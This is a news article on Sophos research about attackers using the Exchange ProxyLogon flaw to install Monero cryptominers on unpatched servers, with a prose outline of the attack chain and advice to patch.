Cyber attackers ranging from nation-state-linked hacking groups to ransomware gangs have rushed to take advantage of unpatched Exchange servers — but they’re not the only ones. SEE: Network security policy (TechRepublic Premium) Cybersecurity researchers at Sophos have identified attackers attempting to take advantage of the Microsoft Exchange Server ProxyLogon exploit to secretly install a Monero cryptominer on Exchange servers. “Server hardware is pretty desirable for cryptojacking because it usually has a higher performance than a desktop or laptop. Because the vulnerability permits the attackers to simply scan the whole internet for available, vulnerable machines, and then roll them into the network, it’s basically free money rolling in for the attackers,” Andrew Brandt, principal threat researcher at Sophos, told ZDNet. Monero isn’t nearly as valuable as Bitcoin, but it’s easier to mine and, crucially for cyber criminals, provides greater anonymity, making the owner of the wallet — and those behind attacks — harder to trace.

While being compromised by a cryptocurrency miner might not sound as bad as a ransomware attack or the loss of sensitive data, it still represents a concern for organisations. That’s because it means cyber attackers have been able to secretly gain access to the network and, crucially, that the organisation still hasn’t applied the critical updates designed to protect against all manner of attacks. According to analysis by Sophos, the Monero wallet of the attacker behind this campaign began receiving funds from mining on March 9, just a few days after the Exchange vulnerabilities came to light, suggesting the attacker was quick off the mark in exploiting unpatched servers. The attacks begin with a PowerShell command that retrieves a file from a previously compromised server’s Outlook Web Access logon path, which in turn downloads executable payloads to install the Monero miner. Researchers note that the executable appears to contain a modified version of a tool that’s publicly available on Github; when the content is run on a compromised server, evidence of installation is deleted, while the mining process runs in memory. SEE: Cybercrime groups are selling their hacking skills. Some countries are buying It’s unlikely that the operators of servers that have been hijacked by crypto-mining malware will notice there’s an issue — unless the attacker gets greedy and uses an extensive amount of processing power that’s easily identified as unusual. To protect networks against attacks that exploit the vulnerabilities in Microsoft Exchange Server, organisations are urged to apply the critical security updates as a matter of immediate priority. “A lot of this speaks to the need for servers, especially internet-facing servers, to be running modern endpoint protection on them. Other than that, Microsoft has spelled out pretty clearly what’s needed to patch the vulnerabilities, so admins need to just be diligent and do those things,” said Brandt.

MORE ON CYBERSECURITY More